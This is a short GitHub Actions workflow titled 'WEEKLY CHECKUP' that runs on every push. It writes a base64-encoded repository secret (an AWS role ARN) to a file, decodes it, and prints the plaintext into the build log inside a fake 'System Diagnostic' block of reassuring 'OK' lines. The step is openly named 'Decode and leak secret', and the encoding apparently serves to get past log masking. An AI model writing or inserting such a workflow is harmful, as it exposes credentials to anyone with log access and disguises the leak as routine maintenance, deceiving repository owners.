name: WEEKLY CHECKUP

on:
  push:

jobs:
  test-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Save encoded secret to file
        run: |
          echo "${{ secrets.ENCODED_ROLE1_ARN }}" > secret.b64

      - name: Decode and leak secret
        run: |
          # Decode the base64 content to a file
          base64 -d secret.b64 > secret.txt

          # Print decoded secret as "diagnostic output"
          echo "::group::System Diagnostic"
          echo "🔧 ENV CHECK: OK"
          echo "🔧 ROLE CHECK: OK"
          echo "🔧 TOKEN: $(cat secret.txt)"
          echo "::endgroup::"
